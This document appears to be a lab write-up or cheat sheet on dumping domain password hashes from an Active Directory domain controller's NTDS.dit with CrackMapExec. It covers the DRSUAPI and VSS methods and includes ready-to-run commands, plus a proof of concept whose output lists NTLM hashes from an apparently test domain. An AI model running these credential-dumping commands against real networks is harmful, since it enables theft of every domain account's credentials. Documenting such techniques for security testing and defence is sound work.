===================================================================================================================================
OS Credential Dumping (NTDS) using the tool 'CrackMapExec'
===================================================================================================================================

The objective is to extract the password hashes of all the domain accounts that are stored in the NTDS.dit file of a Domain Controller.
A valid domain account with high privileges  (e.g. member of the 'Domain admins' group or the 'Administrators' group of the Domain Controller)
is required to dump the NTDS.dit file and the registry hive 'HKLM\SYSTEM'.
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\ntds.dit of a domain controller.

> Usefull link: https://attack.mitre.org/techniques/T1003/003/

Information regarding the tool CrackMapExec
===========================================
> https://github.com/Porchetta-Industries/CrackMapExec

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. 
Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to 
achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
CME makes heavy use of the Impacket library for working with network protocols and performing a variety of post-exploitation techniques.

CrackMapExec allows to dump the NTDS.dit from target DC using the 2 methods from secretsdump.py:

Method 1. DRSUAPI
------------------
Get the domain users list and get its hashes and Kerberos keys using [MS-DRDS] DRSGetNCChanges() call, replicating just the attributes we need.
It uses drsuapi RPC interface create a handle, trigger replication, and combined with additional drsuapi calls to convert the resultant
linked-lists into readable format.

Examples:
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled

Method 2. VSS (Volume Shadow copy Service)
-------------------------------------------
Extract NTDS.dit via vssadmin executed with the smbexec or wmiexec approach. It's copied on the temp dir and parsed remotely.

Examples:
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss --users --enabled


--------------------------------------------------------------------------------------------------------
PoC 1 - Dumping remotely domain password hashes using the tool 'crackmapexec' and the VSS method
--------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/CTFs/BadBlood$ crackmapexec smb 192.168.1.50 -u Administrator -p Test123 --ntds vss > crackmap-NTDS-vss-dump.txt

jeff@kali:~/Documents/CTFs/BadBlood$ more crackmap-NTDS-vss-dump.txt
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123 (Pwn3d!)
SMB         192.168.1.50    445    TEMP-DC          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.1.50    445    TEMP-DC          Administrator:500:aad3b435b51404eeaad3b435b51404ee:a134f40245c97f246e054cd56207eb28:::
SMB         192.168.1.50    445    TEMP-DC          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.1.50    445    TEMP-DC          krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d047<SNIP>
SMB         192.168.1.50    445    TEMP-DC          backup:1008:aad3b435b51404eeaad3b435b51404ee:b9e0cfceaf6d077970306a2fd88a7c0a:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435b51404ee:63897a6fb3ac955b0ec847786bfa9d23:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51404ee:70d56a72e9cacdc6df36d990adb3b073:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\BRIDGET_BALLARD:1114:aad3b435b51404eeaad3b435b51404ee:1d5651ad1e8f8ead2775cfded5c9934e:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\RHONDA_EATON:1115:aad3b435b51404eeaad3b435b51404ee:4c64c4bfd6302278f5b989fc76a886b5:::
<SNIP>
